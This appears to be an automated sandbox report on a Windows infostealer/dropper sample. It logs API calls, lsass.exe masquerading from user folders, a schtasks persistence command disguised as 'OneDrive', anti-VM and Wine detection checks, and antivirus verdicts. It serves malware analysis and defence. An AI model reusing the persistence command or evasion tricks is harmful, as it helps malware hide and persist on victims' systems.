CryptHashData May 6, 2023, 12:07 p.m.	buffer: 2test22Microsoft Windows NT 6.1.7601 Service Pack 1TEST22-PC34252779520 hash_handle: 0x00656ac8 flags: 0	1	1
CryptHashData May 6, 2023, 12:07 p.m.	buffer: 2test22Microsoft Windows NT 6.1.7601 Service Pack 1TEST22-PC34252779520 hash_handle: 0x00656ac8 flags: 0	1	1
CryptHashData May 6, 2023, 12:07 p.m.	buffer: 2test22Microsoft Windows NT 6.1.7601 Service Pack 1TEST22-PC34252779520 hash_handle: 0x00656ac8 flags: 0	1	1
CryptHashData May 6, 2023, 12:07 p.m.	buffer: 2test22Microsoft Windows NT 6.1.7601 Service Pack 1TEST22-PC34252779520 hash_handle: 0x00656ac8 flags: 0	1	1
CryptHashData May 6, 2023, 12:07 p.m.	buffer: 2test22Microsoft Windows NT 6.1.7601 Service Pack 1TEST22-PC34252779520 hash_handle: 0x00656ac8 flags: 0	1	1
CryptHashData May 6, 2023, 12:07 p.m.	buffer: 2test22Microsoft Windows NT 6.1.7601 Service Pack 1TEST22-PC34252779520 hash_handle: 0x00656ac8 flags: 0	1	1
CryptHashData May 6, 2023, 12:07 p.m.	buffer: 2test22Microsoft Windows NT 6.1.7601 Service Pack 1TEST22-PC34252779520 hash_handle: 0x00656ac8 flags: 0	1	1
CryptHashData May 6, 2023, 12:07 p.m.	buffer: 2test22Microsoft Windows NT 6.1.7601 Service Pack 1TEST22-PC34252779520 hash_handle: 0x00656ac8 flags: 0	1	1
CryptHashData May 6, 2023, 12:07 p.m.	buffer: 2test22Microsoft Windows NT 6.1.7601 Service Pack 1TEST22-PC34252779520 hash_handle: 0x00656ac8 flags: 0	1	1
CryptHashData May 6, 2023, 12:07 p.m.	buffer: 2test22Microsoft Windows NT 6.1.7601 Service Pack 1TEST22-PC34252779520 hash_handle: 0x00656ac8 flags: 0	1	1
CryptHashData May 6, 2023, 12:07 p.m.	buffer: 2test22Microsoft Windows NT 6.1.7601 Service Pack 1TEST22-PC34252779520 hash_handle: 0x00656ac8 flags: 0	1	1
CryptHashData May 6, 2023, 12:07 p.m.	buffer: 2test22Microsoft Windows NT 6.1.7601 Service Pack 1TEST22-PC34252779520 hash_handle: 0x00656ac8 flags: 0	1	1
CryptHashData May 6, 2023, 12:07 p.m.	buffer: 2test22Microsoft Windows NT 6.1.7601 Service Pack 1TEST22-PC34252779520 hash_handle: 0x00656ac8 flags: 0	1	1

Created a process named as a common system process (4 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW May 6, 2023, noon	thread_identifier: 2548 thread_handle: 0x0000000000000594 process_identifier: 2576 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Roaming\lsass.exe track: 1 command_line: "C:\Users\test22\AppData\Roaming\lsass.exe" filepath_r: C:\Users\test22\AppData\Roaming\lsass.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000005bc	1	1
ShellExecuteExW May 6, 2023, noon	show_type: 1 filepath_r: C:\Users\test22\AppData\Roaming\lsass.exe parameters: filepath: C:\Users\test22\AppData\Roaming\lsass.exe	1	1
CreateProcessInternalW May 6, 2023, 12:07 p.m.	thread_identifier: 2636 thread_handle: 0x000003d8 process_identifier: 2612 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\ProgramData\lsass\lsass.exe track: 1 command_line: "C:\ProgramData\lsass\lsass.exe" filepath_r: C:\ProgramData\lsass\lsass.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000003e0	1	1
ShellExecuteExW May 6, 2023, 12:07 p.m.	show_type: 1 filepath_r: C:\ProgramData\lsass\lsass.exe parameters: filepath: C:\ProgramData\lsass\lsass.exe	1	1

Uses Sysinternals tools in order to add additional command line functionality (1 event)

cmdline

"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 18:52 /du 23:59 /sc daily /ri 1 /f

Detects VirtualBox through the presence of a registry key (1 event)

registry

HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Detects VMWare through the in instruction feature (1 event)

Time & API	Arguments	Status	Return	Repeated
__exception__ May 6, 2023, 12:07 p.m.	stacktrace: exception.instruction_r: ed 64 8f 05 00 00 00 00 51 e9 f1 10 00 00 81 6c exception.symbol: dllhost+0x1970b6 exception.instruction: in eax, dx exception.module: dllhost.exe exception.exception_code: 0xc0000096 exception.offset: 1667254 exception.address: 0x5970b6 registers.esp: 1638236 registers.edi: 12725774 registers.eax: 1447909480 registers.ebp: 3974000660 registers.edx: 22104 registers.ebx: 1969033397 registers.esi: 5850246 registers.ecx: 20	1	0	0

Detects the presence of Wine emulator (1 event)

registry

HKEY_CURRENT_USER\Software\Wine

File has been identified by 29 AntiVirus engines on VirusTotal as malicious (29 events)

MicroWorld-eScan	Gen:Variant.Tedy.335560
FireEye	Gen:Variant.Tedy.335560
McAfee	Artemis!0E4E3CDACFBE
Malwarebytes	Spyware.Stealer.MSIL
Sangfor	Trojan.Win32.Agent.Vhas
Cybereason	malicious.588f8f
Arcabit	Trojan.Tedy.D51EC8
Elastic	malicious (high confidence)
ESET-NOD32	a variant of MSIL/Agent_AGen.AXB
Paloalto	generic.ml
Kaspersky	UDS:Trojan-Spy.MSIL.Stealer.gen
BitDefender	Gen:Variant.Tedy.335560
Avast	Win32:DropperX-gen [Drp]
Sophos	Mal/Generic-S
VIPRE	Gen:Variant.Tedy.335560
McAfee-GW-Edition	Artemis!Trojan
Emsisoft	Gen:Variant.Tedy.335560 (B)
MAX	malware (ai score=86)
Microsoft	Trojan:Win32/Wacatac.B!ml
ZoneAlarm	UDS:Trojan-Spy.MSIL.Stealer.gen
GData	MSIL.Trojan-Downloader.Dunilaber.LDSGOH
AhnLab-V3	Trojan/Win.Generic.C5411648
BitDefenderTheta	Gen:NN.ZemsilF.36196.fm2@aW7cAAb
ALYac	Gen:Variant.Tedy.335560
Cylance	unsafe
Rising	Trojan.Agent!8.B1E (CLOUD)
AVG	Win32:DropperX-gen [Drp]
DeepInstinct	MALICIOUS
CrowdStrike	win/malicious_confidence_60% (W)

The process powershell.exe wrote an executable file to disk which it then attempted to execute (22 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Users\test22\AppData\Roaming\OneDrive.exe
file	C:\Users\test22\AppData\Roaming\dllhost.exe
file	C:\Users\test22\AppData\Roaming\lsass.exe

file.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All